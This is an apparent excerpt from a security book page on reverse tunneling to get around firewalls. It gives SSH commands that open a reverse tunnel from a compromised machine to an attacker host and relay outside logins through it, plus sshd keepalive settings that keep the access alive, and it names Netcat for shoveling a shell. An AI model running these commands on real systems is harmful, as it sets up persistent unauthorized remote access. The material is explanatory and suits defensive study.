Firewall Circumvention Reverse Tunneling

Popularity:

10

Simplicity:

5

Impact:

10

Risk Rating:

8

Reverse tunneling is another popular method for circumventing firewalls, but unlike the tunnels discussed earlier, it allows inbound access that can allow attackers to connect to a machine behind the firewall. It works by using SSH (or some other protocol, usually encrypted) to shovel a shell to a remote machine. This methodology is most often employed by attackers who have successfully compromised a machine and desire to set up an alternative, easier way to reenter the box.

The following command line can be used to create a reverse tunnel to an attacker's machine on the Internet:

[email protected] machine# ssh -R 1337:localhost:22 [email protected] machine

This creates a connection from owned_machine to attacker_machine and causes attacker_machine to listen on port 1337. When the attacker connects from attacker_ machine to the localhost 1337, it will actually be opening up an SSH connection to owned machine.

This assumes attackers only want to be one step away, which is unlikely. A more realistic scenario would be for attackers to use attacker_machine as a jumping point and connect from elsewhere on the Internet. To facilitate this, they need to make some additional configurations to attacker_machine. Since tunneled ports will often only accept a connection from the localhost, they create another tunnel on attacker_ machine that points from a port on itself that will receive external connections to 1337. The following is an example:

[email protected]_machine# ssh -L 31337:localhost:1337 -f -N -g [email protected]_machine

This creates a local tunnel between 1337 and 31337. When attackers connect from somewhere on the Internet to 31337 on attacker_machine, they will actually be logging into owned_machine.

One thing to note, however, is that the connection on owned_machine will quickly time out if the sshd_config file is not modified as follows:

TCPKeepAlive yes ClientAliveInterval 30 ClientAliveCountMax 99999

Even though SSH is probably the most stable way to create a reverse tunnel, Netcat is still the easiest way to create a reverse tunnel and shovel a shell if encryption is not an issue, in which case Cryptcat could be used. Regardless, these are probably the two best and easiest tools to keep in your toolbox to perform this function.

Was this article helpful?

0 0
The Ultimate Computer Repair Guide

The Ultimate Computer Repair Guide

Read how to maintain and repair any desktop and laptop computer. This Ebook has articles with photos and videos that show detailed step by step pc repair and maintenance procedures. There are many links to online videos that explain how you can build, maintain, speed up, clean, and repair your computer yourself. Put the money that you were going to pay the PC Tech in your own pocket.

Get My Free Ebook


Post a comment